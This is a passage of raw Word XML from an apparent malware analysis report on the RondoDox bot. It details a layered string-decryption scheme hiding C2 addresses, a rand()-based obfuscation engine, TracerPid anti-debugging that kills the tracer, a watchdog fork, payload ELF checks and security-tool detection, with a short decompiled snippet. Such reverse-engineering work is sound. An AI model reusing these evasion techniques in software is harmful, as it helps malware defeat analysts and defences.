          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Runtime String Decryption (FUN_00402530)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">This function is the most critical discovery — it decrypts obfuscated strings at runtime to reveal C2 addresses, paths, tool names, and commands. The decryption pipeline:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 1: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Alternating +5/-5 byte transform (odd positions +5, even positions -5)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 2: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">XOR with 64-byte key derived from DAT_00419FC0 XORed with constant 0x9D</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 3: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Right-rotate each byte by 3 bits (&gt;&gt; 3 | &lt;&lt; 5)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 4: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Full byte reversal (mirror swap of entire buffer)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 5: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Quarter-swap (swap first quarter with second quarter)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 6: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">XOR with 32-byte key derived from DAT_0041A000 XORed with constant 0x91</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 7: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Subtract 9 from each byte</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 8: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ROT-style Caesar cipher on alphabetic (shift 7) and numeric (shift 5) characters</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 9: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Add 1 to each byte</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Impact: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">This routine is called 20+ times throughout the binary to decrypt C2 addresses, file paths, shell commands, and security tool names. All sensitive strings are stored encrypted in .data and only decrypted in memory when needed, then immediately zeroed after use (see FUN_004028E0 which zeros all decrypted buffers).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="120" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="3D7AB5"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Initialization Obfuscation Engine (FUN_004001c0)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Called by both the string decryptor and the encryption engine, this function provides additional randomized confusion layers:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="120" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="3D7AB5"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Layer-by-Layer Decompilation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Layer 1 — Random Byte Array Generation: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Iterates param_1 times calling FUN_004164f8() (rand()), storing results mod 0x100 into a stack-allocated array.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Layer 2 — Conditional XOR: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">For each byte, calls rand(); if result is odd, adds 7; if even, XORs with another rand() mod 0x100.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Layer 3 — XOR with Constant 0xB4: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Each byte XORed with the constant 0xB4, with random swap operations interleaved.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Layer 4 — Random Bit Rotation: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Performs variable bit rotation using rand()-derived shift amounts (up to 8 bits).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Layer 5 — Addition of Constant +4: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Simple additive transformation applied uniformly to all bytes.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Layers 6-9: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Additional random shuffle, substitution, and position-dependent transformations embedded in the calling functions.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Analysis: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">The encryption is designed to defeat static pattern matching by producing different ciphertext for identical plaintext across executions. However, the reliance on libc rand() (seeded by time) makes the scheme cryptographically weak and potentially reversible given a known-plaintext attack.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E5984"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">3.3 Anti-Analysis &amp; Anti-Debugging</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">RondoDox implements multiple anti-analysis techniques decompiled from the binary:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="120" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="3D7AB5"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">TracerPid Anti-Debug (FUN_00401D90)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">This function continuously monitors /proc/[self]/status for the TracerPid field. If a debugger (strace, gdb, ltrace) attaches:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Reads /proc/[pid]/status in a loop</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Parses "TracerPid:\t%d" using sscanf-equivalent</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">If TracerPid &gt; 0: sends </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">SIGKILL (signal 9)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> to the tracer process</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Then kills itself via SIGKILL</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Implements a watchdog fork (FUN_00401F20) that monitors the parent process</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F5F5F5" w:val="clear"/>
        <w:spacing w:after="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="333333"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">// Decompiled anti-debug watchdog (FUN_00401D90)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F5F5F5" w:val="clear"/>
        <w:spacing w:after="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="333333"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">FUN_00411c90(local_88, 0x40, "/proc/%d/status", pid);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F5F5F5" w:val="clear"/>
        <w:spacing w:after="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="333333"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">// Parse TracerPid from /proc status</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F5F5F5" w:val="clear"/>
        <w:spacing w:after="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="333333"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">FUN_004134cc(buf, "TracerPid:\t%d", &amp;tracer_pid);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F5F5F5" w:val="clear"/>
        <w:spacing w:after="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="333333"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">if (tracer_pid &gt; 0) FUN_004112dc(tracer_pid, 9); // kill(tracer, SIGKILL)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="120" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="3D7AB5"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Process Watchdog (FUN_00401F20)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Forks a child process that acts as a watchdog. The child runs FUN_00401D90 (anti-debug loop) and the parent stores the child PID for mutual monitoring via SIGUSR1 (signal 0x11).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="120" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="3D7AB5"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">ELF Header Validation (FUN_00401B10)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Validates downloaded payloads by checking for the ELF magic bytes (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">\x7fELF</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">) and parsing the program header table (PT_DYNAMIC). This ensures only valid ELF binaries are executed, preventing corrupted downloads from crashing the bot.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="120" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="3D7AB5"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Security Tool Detection (FUN_00402AF0)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Decrypts and checks for 11 different security/monitoring tool names:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Decrypts each tool name using FUN_00402530 from separate encrypted buffers</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
